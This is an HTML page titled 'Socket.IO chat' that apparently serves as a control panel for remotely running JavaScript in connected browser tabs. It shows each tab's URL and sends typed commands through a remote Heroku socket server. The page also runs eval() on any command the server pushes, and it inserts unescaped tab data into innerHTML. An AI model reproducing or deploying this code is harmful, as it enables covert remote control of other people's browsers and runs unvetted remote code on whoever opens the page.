<!DOCTYPE html>
<html>

<head>
    <title>Socket.IO chat</title>
    <style>
        body {
            height: 90vh;
            margin: 0;
            padding: 2rem;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
            background: #1f2538;
            color: white;
        }

        #form {
            background: rgba(0, 0, 0, 0.15);
            padding: 0.25rem;
            position: fixed;
            bottom: 30px;
            left: 0;
            right: 0;
            display: flex;
            height: 3rem;
            box-sizing: border-box;
            backdrop-filter: blur(10px);
        }

        #input {
            border: none;
            padding: 0 1rem;
            flex-grow: 1;
            border-radius: 2rem;
            margin: 0.25rem;
        }

        #input:focus {
            outline: none;
        }

        #form>button {
            background: #333;
            border: none;
            padding: 0 1rem;
            margin: 0.25rem;
            border-radius: 3px;
            outline: none;
            color: #fff;
        }

        #messages {
            list-style-type: none;
            margin: 0;
            padding: 0;
        }

        #messages>li {
            padding: 0.5rem 1rem;
        }

        #messages>li:nth-child(odd) {
            background: #efefef;
        }
    </style>
</head>

<body>
    <ul id="messages"></ul>
    <form id="form" action="">
        <input id="input" autocomplete="off" /><button>Send</button>
    </form>

    <script src="socket/socket.io.js"></script>
    <!--/socket.io/socket.io.js-->
    <script>
        var connectionOptions = {
            "force new connection": true,
            "reconnectionAttempts": "Infinity", //avoid having user reconnect manually in order to prevent dead clients after a server restart
            "timeout": 10000, //before connect_error and connect_timeout are emitted.
            "transports": ["websocket"]
        };

        var socket = io("https://virtualchip.herokuapp.com", connectionOptions);

        var messages = document.getElementById('messages');
        var form = document.getElementById('form');
        var input = document.getElementById('input');

        form.addEventListener('submit', function (e) {
            e.preventDefault();
            if (input.value) {
                const [tabId, commandLine] = (input.value).split("--");

                socket.emit('command browser', {
                    tabId: tabId.trim(), 
                    commandLine
                });
                input.value = '';
            }
        });

        socket.on('command browser', function (command) {
            eval(command);
        });


        socket.on('chat message', function (msg) {
            var item = document.createElement('li');
            item.textContent = msg;
            messages.appendChild(item);
            window.scrollTo(0, document.body.scrollHeight);
        });

        socket.on('reveal chip', (data) => {
            const { chip, tab } = data;
            const chipRevealed = document.getElementById(`_${chip.id}`);
            const tabRevealed = document.querySelector(`details#_${chip.id} details#_${tab.id}`)

            if (tabRevealed) {
                chipRevealed.removeChild(tabRevealed);
            }

            if (chipRevealed) {
                const StringNodeTabReveal = `
                    <details id="_${tab.id}">
                        <summary>${tab.name}</summary>
                        <p>
                            <h5>Id:</h5> 
                            <span>${tab.id}</span>
                        </p>
                        <p>
                            <h5>Url:</h5> 
                            <span>${tab.url}</span>
                        </p>
                        <p>
                            <h5>Name:</h5> 
                            <span>${tab.name}</span>
                        </p>
                        <p>
                            <h5>Connected at:</h5> 
                            <span>${new Date(tab.connected_at).toGMTString()}</span>
                        </p>
                    </details>
                `;

                return chipRevealed.innerHTML += StringNodeTabReveal;
            }

            messages.innerHTML += `
                <details id="_${chip.id}">
                    <summary>${chip.name}</summary>
                    <details id="_${tab.id}">
                        <summary>${tab.name}</summary>
                        <p>
                            <h5>Id:</h5> 
                            <span>${tab.id}</span>
                        </p>
                        <p>
                            <h5>Url:</h5> 
                            <span>${tab.url}</span>
                        </p>
                        <p>
                            <h5>Name:</h5> 
                            <span>${tab.name}</span>
                        </p>
                        <p>
                            <h5>Connected at:</h5> 
                            <span>${new Date(tab.connected_at).toGMTString()}</span>
                        </p>
                    </details>
                </details>
            `;
        });

        socket.on("disconnect chip", data => {
            const { chip, socket_id } = data;
            const chipRevealed = document.getElementById(`_${chip.id}`);
            const tab = document.querySelector(`details#_${chip.id} details#_${socket_id}`);


            if (tab) {
                chipRevealed.removeChild(tab);
            }

            if (chipRevealed.childNodes.length === 0) {
                messages.removeChild(chipRevealed);
            }


        })
    </script>
</body>

</html>
